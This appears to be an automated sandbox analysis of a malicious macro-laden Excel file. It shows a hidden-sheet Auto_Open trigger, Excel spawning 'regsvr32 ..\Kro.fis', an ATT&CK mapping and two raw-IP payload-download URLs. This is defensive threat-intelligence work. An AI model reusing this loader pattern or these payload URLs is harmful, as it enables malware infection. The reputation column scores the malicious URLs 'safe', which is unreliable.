    Source: workbook.xmlBinary string: "/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{65963EAE-8CA1-4D1E-8169-DB76380D6F01}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/><sheet name="Sheet" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Sheet2" sheetId="3" state="hidden" r:id="rId3"/></sheets><definedNames><definedName hidden="1" name="_xlnm.Auto_Open">Sheet!$G$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: classification engineClassification label: mal76.troj.expl.evad.winXLSM@7/8@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A7E339B4-3058-4A08-81DB-C31E7AEE949D} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: Decline-172917164-06242021.xlsmVirustotal: Detection: 17%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis2
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Decline-172917164-06242021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: Decline-172917164-06242021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: regsvr32.exe, 00000009.00000002.280104019.0000000004370000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.274665243.0000000004720000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.288894494.0000000004820000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000009.00000002.280104019.0000000004370000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.274665243.0000000004720000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.288894494.0000000004820000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000009.00000002.280104019.0000000004370000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.274665243.0000000004720000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.288894494.0000000004820000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000009.00000002.280104019.0000000004370000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.274665243.0000000004720000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.288894494.0000000004820000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Decline-172917164-06242021.xlsm18%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://5.253.62.174/44372.3561747685.dat0%Avira URL Cloudsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    http://185.234.247.7/44372.3561747685.dat0%Avira URL Cloudsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://5.253.62.174/44372.3561747685.datfalse
    • Avira URL Cloud: safe
    unknown
    http://185.234.247.7/44372.3561747685.datfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
      high
      https://login.microsoftonline.com/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
        high
        https://shell.suite.office.com:1443AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
            high
            https://autodiscover-s.outlook.com/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                high
                https://cdn.entity.AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/queryAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                      high
                      https://powerlift.acompli.netAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                        high
                        https://cortana.aiAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                  high
                                  https://api.aadrm.com/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                        high
                                        https://cr.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControlAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                            high
                                            https://graph.ppe.windows.netAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                            high
                                                            https://graph.windows.netAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                high
                                                                                                https://api.office.netAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                    high
